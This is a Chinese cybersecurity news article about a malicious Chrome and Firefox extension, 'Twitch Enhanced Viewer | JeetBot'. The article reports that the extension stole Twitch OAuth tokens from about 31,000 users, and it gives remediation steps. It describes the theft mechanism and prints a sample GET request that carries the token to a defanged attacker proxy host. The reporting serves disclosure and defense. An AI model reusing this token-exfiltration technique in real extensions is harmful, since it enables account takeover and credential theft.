【安全圈】3万用户中招!恶意插件偷跑Twitch凭据直连俄罗斯代理

· 2026-09-14 19:00 · 8 阅读

安全圈 2026-09-14 19:00 江苏

关键词

恶意插件

⚠️ 安全机构 Socket 于 9 月 14 日发布突发预警:一款打着“画质增强、去除广告”旗号的知名跨平台浏览器扩展程序,被证实长期将近 31,000 名用户的 Twitch OAuth 承载凭证以明文重定向方式输送至俄罗斯商业代理集群。 攻击者无需受害者账号密码或双因子验证(2FA),即可直接接管其会话、窃听私信并操纵账号。

🎭 羊头狗肉:以“1080P解锁”为掩护的凭据劫持

该涉事扩展名为 “Twitch Enhanced Viewer | JeetBot”,长期在谷歌 Chrome Web Store 和火狐 Mozilla Firefox Add-Ons 官方应用商店公开发行。官方应用商店统计显示,Chrome 端受感染用户超过 30,000 人,Firefox 端则有数百名活跃用户。

该扩展宣称是面向主播与观众的专业辅助工具,能为网络受限地区提供 1080P 超清流媒体播放能力并免除贴片广告。但在暗地里,插件获取了极为宽泛的浏览器网络层拦截权限,在用户每次发起视频播放列表(usher.ttvnw.net)请求时,悄悄提取用户的有效登录凭据,将其拼接到外发 URL 的请求参数中。

🔍 偷梁换柱的技术实现机制

▪️ 动态注入与凭据窃取:插件内嵌脚本从当前网页环境中实时截获 Twitch Bearer OAuth Token。

▪️ URL 参数外带:在向 usher.ttvnw.net 拉取 m3u8 播放列表时,通过网络层 Redirect 将用户流量强行重路由至运营者自己的代理服务器,并将 Token 注入为 &auth=[OAuth_Token] 查询参数。

▪️ 代理日志明文沉淀:由于 OAuth 凭据以明文字符串出现在 GET 请求的 URL 参数中,中间代理服务器和反向代理网关的 Access Log 会将所有有效凭据全量持久化归档。

▪️ 历史版本更激进:研究员比对早期 v4.x 版本发现,该插件甚至曾直接使用 HTTP POST 方法将凭据打包回传至 deno.dev 和 deno.net 上的专用数据收集端点。

🕵️‍♂️ 诡异特征:硬编码白名单特意放过 10 位俄语主播

Socket 安全研究员 Kush Pandya 在反编译其 v85.x 核心代码逻辑时,抓取到了一处极具针对性的设计:该插件包含一个硬编码的豁免白名单,精准排除了 10 个特定的头部俄语主播频道。

当受害者浏览这 10 位主播的直播间时,插件会静默关闭凭证外带行为,避免引起来自这些特定社区或技术人员的逆向警觉;而一旦用户切换到其他任何全球频道,凭据外泄管道立即全速启动。

🛡️ 插件源码硬编码的“豁免偷窥”频道名单

▪️ akyuliych(110万粉丝)、pch3lk1n(58万粉丝)、fasoollka(36.1万粉丝)

▪️ lagoda1337(22.5万粉丝)、forzorezor(17.7万粉丝)、flamie(13.2万粉丝)

▪️ lagoda(7.7万粉丝)、dosiafanderalmazer

    # 插件劫持播放流请求,将 Bearer Token 挂载在 URL 查询参数中
    GET

    /api/channel/hls/stream.m3u8?sig=...&
    auth=oauth:2gbxxxxxxxxxxxxxxxxxxxxxxx

    HTTP/1.1
    Host:

    proxy.jeetbot[.]cc
    User-Agent:
     Mozilla/5.0 ...

    ⚡ 卸载根本不够!必须手动吊销已泄露授权

    在事件被安全界公开后,JeetBot 运营者紧急修改了代码并在火狐上线了 85.8.7 修复版本。然而,安全专家严正提醒:单纯升级或卸载该浏览器插件完全无法消除风险!

    OAuth Token 本质上是“无状态的持有者凭证”(Bearer Credential)。只要该令牌处于有效生命周期内,且没有在服务端主动发起撤销,黑客手上的历史日志就能继续畅通无阻地调用官方 API。持有者可以直接查阅受害者的私聊信箱(Whispers)、伪造受害者身份在公共聊天室发言或打赏,甚至擅自更改关联配置。

    🛡️ 个人与企业用户止血方案

    1️⃣ 即刻彻底删除插件:检查 Chrome 与 Firefox 插件清单,彻底移除 Twitch Enhanced Viewer | JeetBot(ID: pnhhdhhcadcjfckjhpmjneldiegbojfb)。

    2️⃣ 全面注销已授权应用连接:登录 Twitch 官方后台,进入 Settings -> Connections(设置-连接与授权应用),将所有历史已授权的第三方应用与扩展连接全部点击 “Disconnect / 吊销连接”,强制使所有旧 Token 立即失效。

    3️⃣ 强制重置密码并启用硬件 2FA:重置主账号登录密码以触发全平台强制登出机制,并绑定物理安全密钥或独立认证器 App。

    4️⃣ 企业终端管控收紧:办公终端必须通过 Chrome Enterprise Policy(管理策略)统一禁用未受信任的第三方开发商插件,防范员工在研发机上因娱乐插件导致内网凭据旁路失窃。

       END  

    阅读推荐

    【安全圈】GitHub又崩了!PR重大中断全球研发停摆

    【安全圈】洗衣机19小时传400MB流量!

    【安全圈】微软9月补丁日!973个漏洞3个已在野利用

    【安全圈】游戏资源站暗藏投毒!黑产盗号卖进暗网

    【安全圈】黑客操纵数百个AI Agent:26秒破11家企业,夜袭440台服务器

    安全圈

    ←扫码关注我们

    网罗圈内热点 专注网络安全

    实时资讯一手掌握!

    好看你就分享 有用就点个赞

    支持「安全圈」就点个三连吧!

    跳转微信打开